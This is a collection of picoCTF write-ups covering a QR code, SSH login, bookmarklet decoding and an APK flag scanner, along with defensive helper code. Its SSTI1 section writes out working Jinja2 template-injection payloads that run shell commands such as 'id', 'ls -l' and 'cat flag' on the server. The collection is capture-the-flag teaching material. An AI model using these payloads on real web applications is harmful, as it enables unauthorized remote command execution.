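    if stripped and len(stripped) % 2 == 0 and HEX_RE.match(stripped):
        yield "hex", bytes.fromhex(stripped.decode("ascii"))


def scan_apk(apk_bytes: bytes):
    """Return [(entry_name, view, flag)] for every flag found in any zip entry."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info.filename)
            for view, blob in candidate_views(data):
                for m in FLAG_RE.finditer(blob):
                    hits.append((info.filename, view, m.group(0).decode("ascii")))
    return hits


def build_sample_apk() -> bytes:
    """Constructed APK-like zip mirroring the two writeups (placeholder flags)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        # like timer: the flag sits in plain text in generated build metadata
        zf.writestr("apktool.yml", "versionName: picoCTF{plain_in_metadata}\n")
        # like Mob psycho: the flag is a hex string in an unusual resource file
        zf.writestr("res/color/flag.txt", b"picoCTF{hex_in_resource}".hex())
        # filler entry that should produce no hit
        zf.writestr("res/anim/abc_fade_in.xml", "<set/>")
    return buf.getvalue()


if __name__ == "__main__":
    for name, view, flag in scan_apk(build_sample_apk()):
        print("%-28s [%s] %s" % (name, view, flag))
```

Listing the archive entries (`zf.infolist()`) is the programmatic counterpart of the `strings mobpsycho.apk | grep flag` trick above: zip central-directory entries store file names in the clear even when the content is compressed.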

## References

- [apk (file format) - Wikipedia](https://en.wikipedia.org/wiki/Apk_(file_format))
- [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html)
- [strings - Linux manual page](https://man7.org/linux/man-pages/man1/strings.1.html)
- [unzip - Linux manual page](https://linux.die.net/man/1/unzip)
- [xxd - Linux manual page](https://linux.die.net/man/1/xxd)

--------------------------------------------------------------------------------
/picoCTF_2024/Forensics/README.md:
--------------------------------------------------------------------------------
# Forensics Challenges

## Easy Forensics Challenges

- [CanYouSee](CanYouSee.md)
- [Scan Surprise](Scan_Surprise.md)
- [Secret of the Polyglot](Secret_of_the_Polyglot.md)
- [Verify](Verify.md)

## Medium Forensics Challenges

- [Blast from the past](Blast_from_the_past.md)
- [Mob psycho](Mob_psycho.md)

--------------------------------------------------------------------------------
/picoCTF_2024/Forensics/Scan_Surprise.md:
--------------------------------------------------------------------------------
# Scan Surprise

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Easy
Tags: picoCTF 2024, Forensics, shell, browser_webshell_solvable, qr_code
Author: JEFFERY JOHN

Description:
I've gotten bored of handing out flags as text. Wouldn't it be cool if they were an image instead?

You can download the challenge files here:
challenge.zip

The same files are accessible via SSH here:
ssh -p 61129 ctf-player@atlas.picoctf.net
Using the password 83dcefb7. Accept the fingerprint with yes, and ls once connected to begin.
Remember, in a shell, passwords are hidden!

Hints:
1. QR codes are a way of encoding data. While they're most known for storing URLs,
they can store other things too.
2. Mobile phones have included native QR code scanners in their cameras since version 8 (Oreo) and iOS 11
3. If you don't have access to a phone, you can also use zbar-tools to convert an image to text
```

Challenge link: [https://play.picoctf.org/practice/challenge/444](https://play.picoctf.org/practice/challenge/444)

## Solution

### Unpacking and basic analysis

We start by unpacking the zip-file:

```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Forensics/Scan_Surprise]
└─$ unzip challenge.zip
Archive:  challenge.zip
   creating: home/ctf-player/drop-in/
 extracting: home/ctf-player/drop-in/flag.png

┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Forensics/Scan_Surprise]
└─$ cd home/ctf-player/drop-in

┌──(kali㉿kali)-[/mnt/…/Scan_Surprise/home/ctf-player/drop-in]
└─$ file flag.png
flag.png: PNG image data, 99 x 99, 1-bit colormap, non-interlaced
```

We have a [PNG-file](https://en.wikipedia.org/wiki/PNG) which is a [QR-code](https://en.wikipedia.org/wiki/QR_code).
Use a tool such as `eog` or `feh` to view it on Linux.

### Get the flag

To get the flag we can use the `zbar-tools` package as described in one of the hints.
Use `sudo apt install zbar-tools` to install it if needed.

```bash
┌──(kali㉿kali)-[/mnt/…/Scan_Surprise/home/ctf-player/drop-in]
└─$ zbarimg flag.png
QR-Code:picoCTF{}
scanned 1 barcode symbols from 1 images in 0.01 seconds
```

For additional information, please see the references below.
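The `file` output above ("99 x 99, 1-bit colormap, non-interlaced") comes from the PNG signature and the first chunk, IHDR. As an added example (my own code, not part of the write-up), the parser below reads those fields directly and verifies the chunk CRC, which is the quick way to tell a genuine PNG from a file that merely carries a `.png` name, and it produces the same one-line summary as `file(1)`. The PNG bytes are constructed (header only, no image data) to match the challenge's dimensions.

```python
"""Parse a PNG signature and IHDR chunk, checking the CRC (added example)."""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
COLOR_TYPES = {0: "grayscale", 2: "RGB", 3: "colormap", 4: "grayscale+alpha", 6: "RGBA"}


def make_chunk(ctype: bytes, payload: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def parse_ihdr(data: bytes) -> dict:
    """Return the IHDR fields of a PNG, raising ValueError on a malformed header."""
    if data[:8] != PNG_SIGNATURE:
        raise ValueError("not a PNG: bad signature")
    (length,) = struct.unpack(">I", data[8:12])
    ctype = data[12:16]
    if ctype != b"IHDR" or length != 13:
        raise ValueError("first chunk must be a 13-byte IHDR")
    payload = data[16:29]
    (stored_crc,) = struct.unpack(">I", data[29:33])
    if zlib.crc32(ctype + payload) & 0xFFFFFFFF != stored_crc:
        raise ValueError("IHDR CRC mismatch")
    width, height, depth, color, _comp, _filt, interlace = struct.unpack(">IIBBBBB", payload)
    return {
        "width": width,
        "height": height,
        "bit_depth": depth,
        "color_type": COLOR_TYPES.get(color, f"unknown({color})"),
        "interlaced": interlace == 1,
    }


def describe(data: bytes) -> str:
    """One-line summary in the style of file(1)."""
    h = parse_ihdr(data)
    lace = "interlaced" if h["interlaced"] else "non-interlaced"
    return f"PNG image data, {h['width']} x {h['height']}, {h['bit_depth']}-bit {h['color_type']}, {lace}"


# Constructed header: 99x99, bit depth 1, colour type 3 (palette), no interlace.
SAMPLE_PNG = PNG_SIGNATURE + make_chunk(b"IHDR", struct.pack(">IIBBBBB", 99, 99, 1, 3, 0, 0, 0))
# Same header with the low byte of the width changed: the stored CRC no longer matches.
CORRUPT_PNG = SAMPLE_PNG[:19] + b"\x01" + SAMPLE_PNG[20:]

if __name__ == "__main__":
    print(describe(SAMPLE_PNG))
    try:
        describe(CORRUPT_PNG)
    except ValueError as err:
        print("corrupt:", err)
```

Checking the CRC matters more than it looks: image viewers are forgiving, so a tampered or truncated header still "opens", while the CRC check flags it immediately.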

## References

- [PNG - Wikipedia](https://en.wikipedia.org/wiki/PNG)
- [QR code - Wikipedia](https://en.wikipedia.org/wiki/QR_code)

--------------------------------------------------------------------------------
/picoCTF_2024/General_Skills/README.md:
--------------------------------------------------------------------------------
# General Skills Challenges

## Easy General Skills Challenges

- [Binary Search](Binary_Search.md)
- [binhexa](binhexa.md)
- [Blame Game](Blame_Game.md)
- [Collaborative Development](Collaborative_Development.md)
- [Commitment Issues](Commitment_Issues.md)
- [endianness](endianness.md)
- [Super SSH](Super_SSH.md)
- [Time Machine](Time_Machine.md)

## Medium General Skills Challenges

- [dont-you-love-banners](dont-you-love-banners.md)
- [SansAlpha](SansAlpha.md)

--------------------------------------------------------------------------------
/picoCTF_2024/General_Skills/Super_SSH.md:
--------------------------------------------------------------------------------
# Super SSH

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Easy
Tags: picoCTF 2024, General Skills, shell, ssh, browser_webshell_solvable
Author: JEFFERY JOHN

Description:
Using a Secure Shell (SSH) is going to be pretty important.
Can you ssh as ctf-player to titan.picoctf.net at port 64614 to get the flag?

You'll also need the password 1ad5be0d. If asked, accept the fingerprint with yes.

If your device doesn't have a shell, you can use: https://webshell.picoctf.org
If you're not sure what a shell is, check out our Primer: https://primer.picoctf.com/#_the_shell

Hints:
1. https://linux.die.net/man/1/ssh
2. You can try logging in 'as' someone with @titan.picoctf.net
3. How could you specify the port?
4. Remember, passwords are hidden when typed into the shell
```

Challenge link: [https://play.picoctf.org/practice/challenge/424](https://play.picoctf.org/practice/challenge/424)

## Solution

We connect with SSH like this:

```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/General_Skills/Super_SSH]
└─$ ssh -p 50400 ctf-player@titan.picoctf.net
The authenticity of host '[titan.picoctf.net]:50400 ([3.139.174.234]:50400)' can't be established.
ED25519 key fingerprint is SHA256:4S9EbTSSRZm32I+cdM5TyzthpQryv5kudRP9PIKT7XQ.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:94: [hashed name]
    ~/.ssh/known_hosts:95: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[titan.picoctf.net]:50400' (ED25519) to the list of known hosts.
ctf-player@titan.picoctf.net's password:
Welcome ctf-player, here's your flag: picoCTF{}
Connection to titan.picoctf.net closed.
```

And there we have the flag.

For additional information, please see the references below.
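The prompt above asks you to accept an ED25519 fingerprint of the form `SHA256:<base64>`; that value is simply the SHA-256 of the host's public-key blob, base64-encoded without padding, so it can be recomputed from a key published out of band and compared before answering `yes`. The `[hashed name]` entries are `HashKnownHosts` lines, `|1|salt|HMAC-SHA1(salt, hostname)`. As an added example (my own code, not part of the write-up), the helpers below compute both. The key line is GitHub's published `ssh-ed25519` host key, taken from their SSH fingerprint documentation (assumed current); the salt and hostnames in the usage are constructed.

```python
"""SSH host key fingerprint and hashed known_hosts checks (added example)."""
import base64
import hashlib
import hmac
import os

# GitHub's published ssh-ed25519 host key (assumption: unchanged since publication).
GITHUB_ED25519_KEY_LINE = (
    "github.com ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMqqnkVzrm0SdG6UOoqKLsabgH5C9okWi0dh2l9GKJl"
)


def fingerprint_sha256(key_line: str) -> str:
    """OpenSSH-style SHA256 fingerprint of a '[host] type base64 [comment]' key line."""
    # Every SSH public-key blob starts with a 4-byte length prefix, hence "AAAA" in base64.
    blob_b64 = next(field for field in key_line.split() if field.startswith("AAAA"))
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def fingerprint_matches(key_line: str, expected: str) -> bool:
    """Constant-time comparison of a computed fingerprint with a pinned one."""
    return hmac.compare_digest(fingerprint_sha256(key_line), expected)


def hash_hostname(hostname: str, salt: bytes = b"") -> str:
    """Build the '|1|salt|hash' host field OpenSSH writes with HashKnownHosts yes."""
    salt = salt or os.urandom(20)
    mac = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return "|1|" + base64.b64encode(salt).decode() + "|" + base64.b64encode(mac).decode()


def hashed_entry_matches(entry: str, hostname: str) -> bool:
    """True if a hashed known_hosts host field was produced for `hostname`."""
    if not entry.startswith("|1|"):
        return False
    _empty, _one, salt_b64, mac_b64 = entry.split("|", 3)
    salt = base64.b64decode(salt_b64)
    expected = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return hmac.compare_digest(expected, base64.b64decode(mac_b64))


if __name__ == "__main__":
    print(fingerprint_sha256(GITHUB_ED25519_KEY_LINE))
    # Non-default ports are recorded as "[host]:port", as in the session above.
    entry = hash_hostname("[titan.picoctf.net]:50400")
    print(entry, hashed_entry_matches(entry, "[titan.picoctf.net]:50400"))
```

The hashed form is why `known_hosts` cannot be read for a list of hosts you have visited, yet a single line can still be verified against a hostname you already know, which is exactly what `ssh` does when it reports "known by the following other names".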

## References

- [Secure Shell - Wikipedia](https://en.wikipedia.org/wiki/Secure_Shell)
- [ssh - Linux manual page](https://man7.org/linux/man-pages/man1/ssh.1.html)

--------------------------------------------------------------------------------
/picoCTF_2024/README.md:
--------------------------------------------------------------------------------
# picoCTF 2024 Challenges

## Binary Exploitation Challenges

### Easy Binary Exploitation Challenges

- [format string 0](Binary_Exploitation/format_string_0.md)
- [format string 1](Binary_Exploitation/format_string_1.md)
- [heap 0](Binary_Exploitation/heap_0.md)
- [heap 1](Binary_Exploitation/heap_1.md)

### Medium Binary Exploitation Challenges

- [format string 2](Binary_Exploitation/format_string_2.md)
- [heap 2](Binary_Exploitation/heap_2.md)

## Cryptography Challenges

### Easy Cryptography Challenges

- [Custom encryption](Cryptography/Custom_encryption.md)
- [interencdec](Cryptography/interencdec.md)

### Medium Cryptography Challenges

- [C3](Cryptography/C3.md)

## Forensics Challenges

### Easy Forensics Challenges

- [CanYouSee](Forensics/CanYouSee.md)
- [Scan Surprise](Forensics/Scan_Surprise.md)
- [Secret of the Polyglot](Forensics/Secret_of_the_Polyglot.md)
- [Verify](Forensics/Verify.md)

### Medium Forensics Challenges

- [Blast from the past](Forensics/Blast_from_the_past.md)
- [Mob psycho](Forensics/Mob_psycho.md)

## General Skills Challenges

### Easy General Skills Challenges

- [Binary Search](General_Skills/Binary_Search.md)
- [binhexa](General_Skills/binhexa.md)
- [Blame Game](General_Skills/Blame_Game.md)
- [Collaborative Development](General_Skills/Collaborative_Development.md)
- [Commitment Issues](General_Skills/Commitment_Issues.md)
- [endianness](General_Skills/endianness.md)
- [Super SSH](General_Skills/Super_SSH.md)
- [Time Machine](General_Skills/Time_Machine.md)

### Medium General Skills Challenges

- [dont-you-love-banners](General_Skills/dont-you-love-banners.md)
- [SansAlpha](General_Skills/SansAlpha.md)

## Reverse Engineering Challenges

### Easy Reverse Engineering Challenges

- [packer](Reverse_Engineering/packer.md)

### Medium Reverse Engineering Challenges

- [FactCheck](Reverse_Engineering/FactCheck.md)

## Web Exploitation Challenges

### Easy Web Exploitation Challenges

- [Bookmarklet](Web_Exploitation/Bookmarklet.md)
- [IntroToBurp](Web_Exploitation/IntroToBurp.md)
- [Unminify](Web_Exploitation/Unminify.md)
- [WebDecode](Web_Exploitation/WebDecode.md)

### Medium Web Exploitation Challenges

- [Trickster](Web_Exploitation/Trickster.md)

--------------------------------------------------------------------------------
/picoCTF_2024/Reverse_Engineering/README.md:
--------------------------------------------------------------------------------
# Reverse Engineering Challenges

## Easy Reverse Engineering Challenges

- [packer](packer.md)

## Medium Reverse Engineering Challenges

- [FactCheck](FactCheck.md)

--------------------------------------------------------------------------------
/picoCTF_2024/Web_Exploitation/Bookmarklet.md:
--------------------------------------------------------------------------------
# Bookmarklet

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Easy
Tags: picoCTF 2024, Web Exploitation, obfuscation, browser_webshell_solvable, browser
Author: JEFFERY JOHN

Description:
Why search for the flag when I can make a bookmarklet to print it for me?

Browse here, and find the flag!

Hints:
1. A bookmarklet is a bookmark that runs JavaScript instead of loading a webpage.
2. What happens when you click a bookmarklet?
3. Web browsers have other ways to run JavaScript too.
```

Challenge link: [https://play.picoctf.org/practice/challenge/406](https://play.picoctf.org/practice/challenge/406)

## Solution

Browse to the web site and you will see a web page like this:

![Bookmarklet web site](Images/Bookmarklet_Web_Site.png)

The text box contains the following JavaScript:

```javascript
javascript:(function() {
    var encryptedFlag = "àÒÆÞ¦È¬ë٣֖ÓÚåÛÑ¢ÕӖәǡ”¥Ìí";
    var key = "picoctf";
    var decryptedFlag = "";
    for (var i = 0; i < encryptedFlag.length; i++) {
        decryptedFlag += String.fromCharCode((encryptedFlag.charCodeAt(i) - key.charCodeAt(i % key.length) + 256) % 256);
    }
    alert(decryptedFlag);
})();
```

You can decode this by running the code in the browser's DevTools. Press `F12` or `Ctrl + Shift + I` to activate the developer tools.
Select the `Console` tab and type `allow pasting` followed by the main part of the code.
I generally prefer to enter the code line-by-line for better understanding:

```text
allow pasting
> var encryptedFlag = "àÒÆÞ¦È¬ëÙ£Ö�ÓÚåÛÑ¢ÕÓ�Ó�Ç¡�¥Ìí";
undefined
> var key = "picoctf";
undefined
> var decryptedFlag = "";
undefined
> for (var i = 0; i < encryptedFlag.length; i++) {
    decryptedFlag += String.fromCharCode((encryptedFlag.charCodeAt(i) - key.charCodeAt(i % key.length) + 256) % 256);
}
'picoCTF{}'
```

And there we have the flag.

For additional information, please see the references below.
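The bookmarklet's loop subtracts key code points from ciphertext code points modulo 256, which is a Vigenère-style shift, and the key ships inside the same snippet, so anyone who can read the page can run it (the DevTools steps above do just that). As an added example (my own code, not the challenge's JavaScript), the Python port below implements both directions and shows why the scheme gives no secrecy even without the key: a known plaintext prefix such as `picoCTF{` yields the key stream directly. The sample plaintext is constructed; the garbled ciphertext from the page is not used.

```python
"""The bookmarklet's byte shift, in both directions (added example)."""


def shift_encrypt(plaintext: str, key: str) -> str:
    """Add key code points to plaintext code points, modulo 256."""
    return "".join(
        chr((ord(p) + ord(key[i % len(key)])) % 256) for i, p in enumerate(plaintext)
    )


def shift_decrypt(ciphertext: str, key: str) -> str:
    """Mirror of the bookmarklet loop: (c - k + 256) % 256 per character."""
    return "".join(
        chr((ord(c) - ord(key[i % len(key)]) + 256) % 256) for i, c in enumerate(ciphertext)
    )


def recover_key_stream(ciphertext: str, known_prefix: str) -> str:
    """Ciphertext minus known plaintext gives the key bytes used at those positions."""
    return "".join(
        chr((ord(c) - ord(p)) % 256) for c, p in zip(ciphertext, known_prefix)
    )


if __name__ == "__main__":
    key = "picoctf"
    sample = shift_encrypt("picoCTF{constructed_placeholder}", key)  # constructed input
    print(repr(sample))
    print(shift_decrypt(sample, key))
    # With a 7-character key and an 8-character known prefix, the stream wraps: "picoctfp".
    print(recover_key_stream(sample, "picoCTF{"))
```

Because every output code point stays below 256, the ciphertext is a Latin-1 string, which is why the page's literal is a run of accented characters rather than arbitrary Unicode.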

## References

- [Bookmarklet - Wikipedia](https://en.wikipedia.org/wiki/Bookmarklet)
- [JavaScript - Wikipedia](https://en.wikipedia.org/wiki/JavaScript)

--------------------------------------------------------------------------------
/picoCTF_2024/Web_Exploitation/Images/Bookmarklet_Web_Site.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2024/Web_Exploitation/Images/Bookmarklet_Web_Site.png

--------------------------------------------------------------------------------
/picoCTF_2024/Web_Exploitation/README.md:
--------------------------------------------------------------------------------
# Web Exploitation Challenges

## Easy Web Exploitation Challenges

- [Bookmarklet](Bookmarklet.md)
- [IntroToBurp](IntroToBurp.md)
- [Unminify](Unminify.md)
- [WebDecode](WebDecode.md)

## Medium Web Exploitation Challenges

- [Trickster](Trickster.md)

--------------------------------------------------------------------------------
/picoCTF_2025/Binary_Exploitation/README.md:
--------------------------------------------------------------------------------
# Binary Exploitation Challenges

## Easy Binary Exploitation Challenges

- [PIE TIME](PIE_TIME.md)

--------------------------------------------------------------------------------
/picoCTF_2025/Cryptography/README.md:
--------------------------------------------------------------------------------
# Cryptography Challenges

## Easy Cryptography Challenges

- [EVEN RSA CAN BE BROKEN???](EVEN_RSA_CAN_BE_BROKEN.md)
- [hashcrack](hashcrack.md)

--------------------------------------------------------------------------------
/picoCTF_2025/Forensics/Images/Info_encoded_in_RED.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2025/Forensics/Images/Info_encoded_in_RED.png

--------------------------------------------------------------------------------
/picoCTF_2025/Forensics/README.md:
--------------------------------------------------------------------------------
# Forensics Challenges

## Easy Forensics Challenges

- [Ph4nt0m 1ntrud3r](Ph4nt0m_1ntrud3r.md)
- [RED](RED.md)

--------------------------------------------------------------------------------
/picoCTF_2025/General_Skills/README.md:
--------------------------------------------------------------------------------
# General Skills Challenges

## Easy General Skills Challenges

- [FANTASY CTF](FANTASY_CTF.md)
- [Rust fixme 1](Rust_fixme_1.md)
- [Rust fixme 2](Rust_fixme_2.md)
- [Rust fixme 3](Rust_fixme_3.md)

--------------------------------------------------------------------------------
/picoCTF_2025/README.md:
--------------------------------------------------------------------------------
# picoCTF 2025 Challenges

## Binary Exploitation Challenges

### Easy Binary Exploitation Challenges

- [PIE TIME](Binary_Exploitation/PIE_TIME.md)

## Cryptography Challenges

### Easy Cryptography Challenges

- [EVEN RSA CAN BE BROKEN???](Cryptography/EVEN_RSA_CAN_BE_BROKEN.md)
- [hashcrack](Cryptography/hashcrack.md)

## Forensics Challenges

### Easy Forensics Challenges

- [Ph4nt0m 1ntrud3r](Forensics/Ph4nt0m_1ntrud3r.md)
- [RED](Forensics/RED.md)

## General Skills Challenges

### Easy General Skills Challenges

- [FANTASY CTF](General_Skills/FANTASY_CTF.md)
- [Rust fixme 1](General_Skills/Rust_fixme_1.md)
- [Rust fixme 2](General_Skills/Rust_fixme_2.md)
- [Rust fixme 3](General_Skills/Rust_fixme_3.md)

## Reverse Engineering Challenges

### Easy Reverse Engineering Challenges

- [Flag Hunters](Reverse_Engineering/Flag_Hunters.md)

## Web Exploitation Challenges

### Easy Web Exploitation Challenges

- [Cookie Monster Secret Recipe](Web_Exploitation/Cookie_Monster_Secret_Recipe.md)
- [head-dump](Web_Exploitation/head-dump.md)
- [n0s4n1ty 1](Web_Exploitation/n0s4n1ty_1.md)
- [Pachinko](Web_Exploitation/Pachinko.md)
- [SSTI1](Web_Exploitation/SSTI1.md)

--------------------------------------------------------------------------------
/picoCTF_2025/Reverse_Engineering/README.md:
--------------------------------------------------------------------------------
# Reverse Engineering Challenges

## Easy Reverse Engineering Challenges

- [Flag Hunters](Flag_Hunters.md)

--------------------------------------------------------------------------------
/picoCTF_2025/Web_Exploitation/Images/Cookie_Monster.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2025/Web_Exploitation/Images/Cookie_Monster.png

--------------------------------------------------------------------------------
/picoCTF_2025/Web_Exploitation/Images/Heapdump_endpoint_info.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2025/Web_Exploitation/Images/Heapdump_endpoint_info.png

--------------------------------------------------------------------------------
/picoCTF_2025/Web_Exploitation/Images/NoSanity_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2025/Web_Exploitation/Images/NoSanity_1.png

--------------------------------------------------------------------------------
/picoCTF_2025/Web_Exploitation/Images/Pachinko_NAND_Simulator.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2025/Web_Exploitation/Images/Pachinko_NAND_Simulator.png

--------------------------------------------------------------------------------
/picoCTF_2025/Web_Exploitation/Images/SSTI_Decision_Tree.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2025/Web_Exploitation/Images/SSTI_Decision_Tree.png

--------------------------------------------------------------------------------
/picoCTF_2025/Web_Exploitation/Images/head-dump.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2025/Web_Exploitation/Images/head-dump.png

--------------------------------------------------------------------------------
/picoCTF_2025/Web_Exploitation/README.md:
--------------------------------------------------------------------------------
# Web Exploitation Challenges

## Easy Web Exploitation Challenges

- [Cookie Monster Secret Recipe](Cookie_Monster_Secret_Recipe.md)
- [head-dump](head-dump.md)
- [n0s4n1ty 1](n0s4n1ty_1.md)
- [Pachinko](Pachinko.md)
- [SSTI1](SSTI1.md)

--------------------------------------------------------------------------------
/picoCTF_2025/Web_Exploitation/SSTI1.md:
--------------------------------------------------------------------------------
# SSTI1

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information

```text
Level: Easy
Tags: Web Exploitation, picoCTF 2025, browser_webshell_solvable
Author: VENAX

Description:
I made a cool website where you can announce whatever you want!
Try it out!
I heard templating is a cool and modular way to build web apps!
Check out my website here!

Hints:
1. Server Side Template Injection
```

Challenge link: [https://play.picoctf.org/practice/challenge/492](https://play.picoctf.org/practice/challenge/492)

## Solution

Browse to the web site and you will see a web page that includes the text

```text
Home
I built a cool website that lets you announce whatever you want!*

What do you want to announce:
```

followed by an input text box and an `OK`-button.

### Verify SSTI

The hint has already given away that the site uses [server-side templates](https://portswigger.net/web-security/server-side-template-injection), but we need to verify that and find out the backend technology used.

To help with that we use the following decision tree from [PortSwigger's page on Server-side template injection](https://portswigger.net/web-security/server-side-template-injection):

![SSTI Decision Tree](Images/SSTI_Decision_Tree.png)

The tests done are as follows:

1. Entering `${7*7}` yields `${7*7}`,
2. Entering `{{7*7}}` yields `49` and
3. `{{7*'7'}}` yields `7777777`

So now we know we have a Jinja2 backend (Twig, the other `{{ }}` engine in the tree, would have evaluated `{{7*'7'}}` to `49`).

Googling around for SSTI Jinja2-payloads I found this one: `{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}`

### Look for the flag

Using the payload `{{request.application.__globals__.__builtins__.__import__('os').popen('ls -l').read()}}` we get the following result

```html
total 12
drwxr-xr-x 2 root root   32 Apr 12 10:09 __pycache__
-rwxr-xr-x 1 root root 1241 Mar  6 03:27 app.py
-rw-r--r-- 1 root root   58 Mar  6 19:44 flag
-rwxr-xr-x 1 root root  268 Mar  6 03:27 requirements.txt
```

So now we have the name and location of the flag.

### Get the flag

We get the flag with the payload `{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag').read()}}`

For additional information, please see the references below.

## References

- [Flask (web framework) - Wikipedia](https://en.wikipedia.org/wiki/Flask_(web_framework))
- [Jinja (template engine) - Wikipedia](https://en.wikipedia.org/wiki/Jinja_(template_engine))
- [Server-side template injection - PortSwigger](https://portswigger.net/web-security/server-side-template-injection)

--------------------------------------------------------------------------------
/picoGym_Exclusive/Binary_Exploitation/README.md:
--------------------------------------------------------------------------------
# Binary Exploitation Challenges

1 Challenge:
- [Local Target](Local_Target.md)

--------------------------------------------------------------------------------
/picoGym_Exclusive/Forensics/Name_of_SSID_Field_in_Wireshark.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoGym_Exclusive/Forensics/Name_of_SSID_Field_in_Wireshark.png

--------------------------------------------------------------------------------
/picoGym_Exclusive/Forensics/README.md:
--------------------------------------------------------------------------------
# Forensics Challenges

1 Challenge:
- [WPA-ing Out](WPA-ing_Out.md)

--------------------------------------------------------------------------------
/picoGym_Exclusive/General_Skills/ASCII_Numbers.md:
--------------------------------------------------------------------------------
# ASCII Numbers

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)
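For the SSTI1 write-up above, the following is an added example (my own code, not the challenge's `app.py`) of the bug behind the `{{7*7}}` probe and of its fix. The vulnerable form splices user input into the template *source*, so Jinja2 evaluates whatever expressions it contains; the safe form keeps the template constant and passes the input as a variable, which Jinja2 then treats as data and escapes. A `SandboxedEnvironment` is shown as defence in depth only: it refuses `_`-prefixed attribute traversal but still evaluates expressions. It assumes the `jinja2` package is installed; the `PAGE` template and the announcement strings are constructed.

```python
"""Server-side template injection: vulnerable, safe and sandboxed rendering (added example)."""
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment

# Constructed stand-in for the announcement page's template.
PAGE = "Announcement: {announcement}"


def render_vulnerable(announcement: str) -> str:
    """User input becomes part of the template source, so {{ }} inside it is executed."""
    template_source = PAGE.format(announcement=announcement)
    return Environment(autoescape=True).from_string(template_source).render()


def render_safe(announcement: str) -> str:
    """Template text is constant; the input arrives as a variable and is escaped."""
    template = Environment(autoescape=True).from_string("Announcement: {{ announcement }}")
    return template.render(announcement=announcement)


def render_sandboxed(announcement: str) -> str:
    """Same splice as render_vulnerable, but the sandbox blocks unsafe attribute access.

    Expressions such as {{7*7}} still evaluate, so this is a mitigation layer, not the fix.
    """
    template_source = PAGE.format(announcement=announcement)
    return SandboxedEnvironment(autoescape=True).from_string(template_source).render()


def looks_injectable(render) -> bool:
    """Self-test using the arithmetic probes from the write-up's decision tree."""
    out_num = render("{{7*7}}")
    out_str = render("{{7*'7'}}")
    return "49" in out_num or "7777777" in out_str


if __name__ == "__main__":
    for name, fn in [("vulnerable", render_vulnerable), ("safe", render_safe), ("sandboxed", render_sandboxed)]:
        print(f"{name:10s} injectable={looks_injectable(fn)!s:5s} {fn('{{7*7}}')!r}")
    # Attribute traversal is refused by the sandbox (renders empty), allowed by the plain environment.
    print(repr(render_vulnerable("{{ ''.__class__ }}")))
    print(repr(render_sandboxed("{{ ''.__class__ }}")))
```

`looks_injectable` is the check to run against your own render path in a unit test: if a literal `{{7*7}}` ever comes back as `49`, user input has reached the template source.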

## Challenge information
```
Points: 100
Tags: picoGym Exclusive, General Skills
Author: LT 'SYREAL' JONES

Description:
Convert the following string of ASCII numbers into a readable string:
0x70 0x69 0x63 0x6f 0x43 0x54 0x46 0x7b 0x34 0x35 0x63 0x31 0x31 0x5f 0x6e 0x30 0x5f 0x71 0x75 0x33 0x35 0x37 0x31 0x30 0x6e 0x35 0x5f 0x31 0x6c 0x6c 0x5f 0x74 0x33 0x31 0x31 0x5f 0x79 0x33 0x5f 0x6e 0x30 0x5f 0x6c 0x31 0x33 0x35 0x5f 0x34 0x34 0x35 0x64 0x34 0x31 0x38 0x30 0x7d

Hints:
1. CyberChef is a great tool for any encoding but especially ASCII.
2. Try CyberChef's 'From Hex' function
```
